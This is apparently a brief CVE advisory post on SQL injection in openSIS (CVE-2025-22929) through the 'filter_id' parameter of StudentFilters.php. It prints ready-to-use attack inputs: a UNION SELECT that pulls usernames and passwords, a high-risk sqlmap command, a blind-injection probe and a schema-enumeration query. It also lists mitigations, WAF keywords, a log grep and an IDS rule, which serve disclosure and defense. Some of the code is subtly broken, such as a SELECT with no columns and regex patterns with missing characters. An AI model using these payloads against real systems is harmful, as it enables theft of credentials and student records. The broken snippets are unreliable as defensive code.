OS4ED openSIS, SQL Injection, CVE-2025-22929 (Critical)

How the CVE Works

CVE-2025-22929 is a SQL injection vulnerability in OS4ED openSIS versions 7.0 to 9.1. The flaw exists in the `filter_id` parameter of /students/StudentFilters.php, where improper input sanitization allows attackers to inject malicious SQL queries. When a crafted payload is sent via this parameter, the backend database executes unintended commands, potentially enabling unauthorized data access, manipulation, or deletion. The lack of prepared statements or parameterized queries exacerbates the risk, making exploitation trivial for attackers with network access.

DailyCVE Form

Platform: OS4ED openSIS
Version: 7.0 to 9.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/29/2025

What Undercode Say:

Exploitation:

1. Craft Payload:

GET /students/StudentFilters.php?filter_id=1' UNION SELECT username,password FROM users-- HTTP/1.1

2. Automated Testing (SQLmap):

sqlmap -u "http://target/students/StudentFilters.php?filter_id=1" --risk=3 --level=5

3. Blind SQLi Detection:

GET /students/StudentFilters.php?filter_id=1' AND (SELECT 1 FROM users LIMIT 1)-- HTTP/1.1

Mitigation:

1. Patch: Upgrade to openSIS v9.2+.

2. Input Sanitization:

$filter_id = mysqli_real_escape_string($conn, $_GET['filter_id']);

3. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM filters WHERE id = ?");
$stmt->bind_param("i", $filter_id);

4. WAF Rules: Block suspicious patterns (e.g., UNION SELECT, --).

Detection:

1. Log Analysis:

grep "StudentFilters.php?filter_id=.[';]" /var/log/apache2/access.log

2. IDS Signature:

alert http any any -> $HOME_NET any (msg:"SQLi in openSIS"; uricontent:"/StudentFilters.php"; pcre:"/filter_id=[^&][';]/"; sid:1000001;)

Post-Exploit:

  • Database Enumeration:
    SELECT table_name FROM information_schema.tables WHERE table_schema=database();
    
  • Mitigation Verification:
    curl -s "http://patched-site/students/StudentFilters.php?filter_id=1'" | grep "SQL syntax"
    

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top